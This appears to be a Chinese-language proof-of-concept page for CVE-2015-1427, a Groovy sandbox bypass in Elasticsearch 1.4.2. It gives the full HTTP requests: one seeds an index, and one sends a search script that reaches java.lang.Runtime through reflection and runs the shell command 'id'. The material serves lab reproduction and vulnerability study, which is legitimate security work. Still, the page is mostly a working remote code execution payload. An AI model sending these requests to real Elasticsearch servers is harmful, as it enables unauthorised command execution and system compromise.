跳到主要内容

ElasticSearch Groovy 沙盒绕过 && 代码执行漏洞(CVE-2015-1427)

jre版本:openjdk:8-jre

elasticsearch版本:v1.4.2

POC

由于查询时至少要求 es 中有一条数据,因此首先构造一个数据包增加一条数据

POST /website/blog/ HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25

{
"name": "test"
}

image-20221012165054661

构造含有payload的数据包发送

POST /_search?pretty HTTP/1.1
Host: your-ip:9200
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Content-Type: application/text
Content-Length: 156

{"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"id\").getText()"}}}

image-20221012165624680